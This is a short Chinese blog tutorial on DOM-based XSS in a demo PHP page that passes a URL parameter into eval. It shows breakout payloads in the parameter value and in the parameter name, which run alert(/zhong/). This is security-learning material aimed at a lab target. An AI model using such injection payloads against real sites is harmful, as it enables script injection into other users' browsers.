大哥带的DOM-XSS进阶eval构造XSS

0X01源码分析

那么我们可以如何来构造语法呐？？
已知eval函数可以执行js

最终的输出是eval(this.xss="你提交的参数";)

那我们是不是可以从参数这里构造一个js

比如

this.xss=1";alert(/zhong/);//

那么我们要这样构造

http://www.xss_demo.com/DOM-xss5.php?xss=k";alert(/zhong/);//

当然这里未对参数名称做验证我们也可以直接在参数名称里面构造

xss

http://www.xss_demo.com/DOM-xss5.php?xss;alert(/zhong/);//=123456

切记学习之路少就是多慢就是快

posted @ 2019-06-04 22:14 yourse1f 阅读(1316) 评论(0) 编辑收藏举报

刷新页面返回顶部

Welcome Q's Blog